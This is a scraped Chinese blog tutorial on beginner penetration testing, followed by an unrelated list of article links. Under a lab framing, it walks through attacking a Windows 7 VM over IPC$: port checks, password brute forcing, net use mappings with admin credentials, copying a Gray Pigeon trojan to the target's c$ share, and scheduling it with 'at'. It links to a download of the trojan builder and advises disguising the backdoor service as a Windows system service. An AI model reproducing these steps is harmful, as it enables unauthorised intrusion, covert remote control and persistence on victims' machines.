渗透测试基础入门【01】——测试流程(IPC$)

news2024/11/25 6:59:29

渗透测试基础入门【01】——测试流程(IPC$)

注意,攻击对方需要对方授权,本文章目的只为教学,不要拿去干违法的事

1 渗透测试流程

  1. 授权(获取目标用户授权,否则是违法行为)
  2. 信息收集
nslookup   whois
  1. 扫描漏洞
nmap=ip范围	端口(80...) 服务器类型(IISApache) 什么类型的网站

高级扫描:

利用服务器本身漏洞
如IIS漏洞2003-IIS6.0 2008-IIS7.0, 网站漏洞

  1. 漏洞利用
  2. 提权(shell环境、桌面环境、最高权限)

shell环境的意思是拿到对方的命令行窗口,相当于你本地操作的是对方的命令行

  1. 消除入侵痕迹
  2. 留后门

可以留下一个木马或者其他,方便下次直接入侵

  1. 渗透测试报告

2 简单漏洞利用【IPC$】

Internet Process Connection(IPC)命名管道
此处我使用我本地win10的本机去破解虚拟机上的win7

手工测试端口号开放:

telnet IP地址 测试端口

telnet 192.168.145.98 445
  • 出现如下界面表明对方开启445端口(黑窗口)
    在这里插入图片描述

  • 如下界面表明对方未开启端口
    在这里插入图片描述

①scanport扫描445端口

②漏洞利用之IPC$

进行账户暴力破解:NTscan

net use f: \\10.1.1.2\share 密码 /user:用户
net use f: /del
net use * /del

# c$对应的是对方用户的c盘
net use f: \\10.1.1.2\c$ 密码 /user:用户
# ipc$对应是对方用户的所有盘
net use f: \\10.1.1.2\ipc$ 密码 /user:用户
  • 使用管理员运行cmd【win+r 然后ctrl+shift+enter】
net use \\192.168.145.98\ipc$ 123.com /user:administrator
# 123.com 密码(如果是空密码,直接输入""即可)
# administrator 账户

在这里插入图片描述

>f7可以查看cmd历史命令,esc退出查看
  • 查看是否映射成功
net use

在这里插入图片描述

③暴力破解系统密码(445端口)

过程省略…

④植入木马(留后门)

制作木马【灰鸽子软件】
链接:https://pan.baidu.com/s/1Za54jFQJyTkxDPDVKMQzAA?pwd=zj8k
提取码:zj8k

  • 配置服务器程序(木马)
    在这里插入图片描述
    在这里插入图片描述

启动项可以不用设置,保持默认也行,不过为了防止用户识别出密码,我们可以将名称改为windows system service等等【该服务会自动写到注册表并注册为服务】

在这里插入图片描述

copy d:\\heihei.exe \\192.168.145.30\c$

# copy heihei.exe \\192.168.145.98\d$
  • 结果:
    在这里插入图片描述

  • 虚拟机上也已经有对应文件了:

在这里插入图片描述

⑤设置计划任务、自动执行木马

  • 查看时间
# 查询目标机上对应时间,方便设置定时任务
net time \\192.168.145.98

在这里插入图片描述

  • 设置定时任务
at \\192.168.14530 15:00 "c:\heihei.exe"

在这里插入图片描述

  • 结果查看

在目标机器(win7)以管理员运行cmd,查看定时任务

at

在这里插入图片描述
⑥等待肉鸡上线

在这里插入图片描述
在这里插入图片描述

现在来到win7,win+R,输入services.msc,查看对应服务

在这里插入图片描述

服务成功注册!!!

3 扫描与爆破

参考:扫描与爆破流程

资料:

①安装的win7没有管理员

WIN7家庭普通版没有“本地用户和组”项,不能通过“用计算机右键-管理”的方法开启超级管理员帐户Administrator。

要开启Win7家庭普通版本的超级管理员账户,你首先需要使用拥有管理员权限的账户登录系统,然后按照以下步骤操作:

1> 打开注册表:点击“开始”-> “运行” 在运行窗口中输入:regedit

2> 找到注册表项:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\

3> 在上述注册表项下新建注册表项“SpecialAccounts”,再在其下新建子项“UserList”,然后新建一个名为“Administrator”的DWORD(32位)值,将其数值改成“1”

4> 激活administrator用户。重启计算机,按F8后进安全模式,在管理员权限下点击“开始”-> “运行” 在运行窗口中输入:cmd,在DOS窗口下输入:

复制代码代码如下:

net user administrator /active:yes

5> 重启计算机或切换用户,这时应该能看到超级管理员administrator用户,以administrator身份登陆即可,默认无密码!

②iso文件

  • 可以通过https://msdn.itellyou.cn/下载
    在这里插入图片描述
  • 百度网盘

链接:https://pan.baidu.com/s/1Ela-qgJ6sJQPtrMO5PzZRA?pwd=zj8k
提取码:zj8k

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/169333.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【4 - 降维算法PCA和SVD - 原理部分】菜菜sklearn机器学习

课程地址:《菜菜的机器学习sklearn课堂》_哔哩哔哩_bilibili 第一期:sklearn入门 & 决策树在sklearn中的实现第二期:随机森林在sklearn中的实现第三期:sklearn中的数据预处理和特征工程第四期:sklearn中的降维算法…

nacos注册源码分析

Nacos注册服务 cosumer启动的时候,从nacos server上读取指定服务名称的实例列表,缓存到本地内存中。 开启一个定时任务,每隔10s去nacos server上拉取服务列表 nacos的push机制: 通过心跳检测发现服务提供者出现心态超时的时候…

SpringCloud学习笔记 - 流控规则 - Sentinel

1. Sentinel流控规则简介 这里的流控指的是“流量控制”,进一步解释说明: 资源名:唯一名称,默认请求路径。 针对来源:Sentinel可以针对调用者进行限流,填写微服务名,默认default(不…

爬虫解析模块(bs4,selenium)

bs4文档 from bs4 import BeautifulSoupBeautiful Soup提供一些简单的、python式的函数用来处理导航、搜索、修改分析树等功能。Beautiful Soup自动将输入文档转换为Unicode编码,输出文档转换为utf-8编码。 解析器 解析器使用方法优势劣势Python标准库BeautifulS…

Dubbo——入门介绍

目录1.概述1.1.什么是 Dubbo ?1.2.Dubbo 架构2.Dubbo 快速入门2.1.Zookeeper 安装2.2.创建项目2.3.代码实现2.3.1.dubbo-service 模块2.3.2.dubbo-web 模块2.4.本地启动2.5.使用 Dubbo 实现 PRC2.5.1.修改 dubbo-service 模块2.5.2.修改 dubbo-web 模块2.5.3.启动 d…

可免费编辑 PDF 内容的 7 大 PDF 编辑工具

有时您可能希望编辑 PDF 文档中的敏感信息,例如财务帐号和 ID 号,以便在不泄露隐私的情况下共享 PDF。编辑 PDF 是从 PDF 中删除私有内容。使用PDF 编辑工具可以轻松完成编辑。市场上有这么多工具,您需要选择最好的一种。 7 大 PDF 编辑工具 …

data analysis and predict

data anlysis and predict 谢邀,本人正在崩溃和兴奋间反复横跳(崩溃居多),anyway, 我心态超好的!besides, 仅供个人学习查阅,不具任何参考价值!!! (小边不想努…

路由信息协议RIP

文章目录路由信息协议RIP一、Routing Information Protocol的定义二、RIP的基本工作过程三、“坏消息传播得慢”的问题四、总结路由信息协议RIP 一、Routing Information Protocol的定义 RIP是分布式的基于距离向量的路由选择协议 协议RIP的特点是: 仅和相邻路由…

Java数据结构(泛型)

1、集合框架 Java 集合框架Java Collection Framework ,又被称为容器container ,是定义在 java.util 包下的一组接口interfaces 和其实现类classes 。 其主要表现为将多个元素element 置于一个单元中,用于对这些元素进行快速、便捷的存储sto…

【XML了解】xml与hxml 标记语言学习

XML与HXML的区别 XML 被设计用来传输和存储数据,结构化、存储以及传输信息(如:数据包) XML 被设计用来传输和存储数据,其焦点是数据的内容 XML 标签没有被预定义, 需要自行定义标签 HTML 被设计用来表现和展示数据&…

数组常用方法总结 (7) :copyWithin / fill / reduce / reduceRight

copyWithin 将指定位置的元素复制到数组的其他位置。返回值为移动后数组。原始数组的内容会被改变,原始数组的长度不会改变。arr.copyWithin(index, startIndex, endIndex)第一个参数为,期望被复制的内容将要插入的位置。第二个参数为,数组中…

SpringBoot 参数接收只看这一篇文章就够了

好久没有写过接口了,最近在写一些基础接口,在写参数接口接收参数的时候居然想不起来,会有那么一丝丝的怀疑,虽然并不会影响编码,但是说明一个问题,没有系统的总结知识,没有温故知新,…

PMP真的有用吗?

作为一个考了PMP的前辈来说,是有用的。PMP 含金量,PMP有没有用,这类问题一直是大家关注的重点,知乎上几个相关问题热度也一直很高。友情提示一句:PMP 就是一个证书,能起到加分和门槛的作用,技术…

Diazo Biotin-PEG3-DBCO,二苯并环辛炔PEG3重氮生物素,无铜 Click Chemistry

Diazo Biotin-PEG3-DBCO反应原理:Diazo Biotin-PEG3-DBCO 是一种点击化学标记生物素,可通过无铜 Click Chemistry 与叠氮化物发生反应。重氮允许使用连二亚硫酸钠 (Na2S2O4) 从链霉亲和素中有效释放捕获的生物素化分子。点击化学生物素标记试剂包含各种点…

基于麻雀算法优化的深度极限学习机DLM的预测算法(Matlab代码实现)

💥💥💞💞欢迎来到本博客❤️❤️💥💥 🏆博主优势:🌞🌞🌞博客内容尽量做到思维缜密,逻辑清晰,为了方便读者。 ⛳️座右铭&a…

基于SpringBoot的SSMP整合(业务层表现层)

基于SpringBoot的SSMP整合(数据层)https://blog.csdn.net/weixin_51882166/article/details/128693739?spm1001.2014.3001.5502 标准CRUD Service层接口定义与数据层接口定义具有较大差距。 定义Service接口: package com.example.ssmp_…

蓝桥杯STM32G431RBT6学习——LCD

蓝桥杯STM32G431RBT6学习——LCD 前言 作为在开发板上最显眼的LCD屏幕,自然而然也是每年的必考考点。国信长天开发板使用的是一块2.4寸(240*320)的TFT-LCD液晶屏,其引脚占用如下: 其中,CS为片选信号引脚…

【Netty】实现IM聊天室案例Demo

文章目录1、WebSocket链接建立2、实现用户上线功能3、私聊发送消息注意: 该文章不会详细介绍Netty相关概念和原理,主要目的是介绍如何快速构建聊天室Demo 不会在文章主体过多说明代码流程,文章中的代码已经配备了详细的注释 1、WebSocket链接…

网站建设 之 用js写wasm

为什么要这么做?编译js比解释js更快是必然的wasm是什么?我期望是一个二进制文件WebAssembly(又名wasm)是一种高效的,低级别的编程语言。 它让我们能够使用JavaScript以外的语言(例如C,C &#x…

【Linux】进度条小程序

目录一.\r && \n二.行缓存区概念问题:解答:检测:三.进度条1.进度动态条2.进度百分比3.小装饰4.颜色该篇博客会主要按步骤推导出一个在Linux上运行的进度条小程序,会用到vim编辑器和gcc编译器,如果对这两个软件…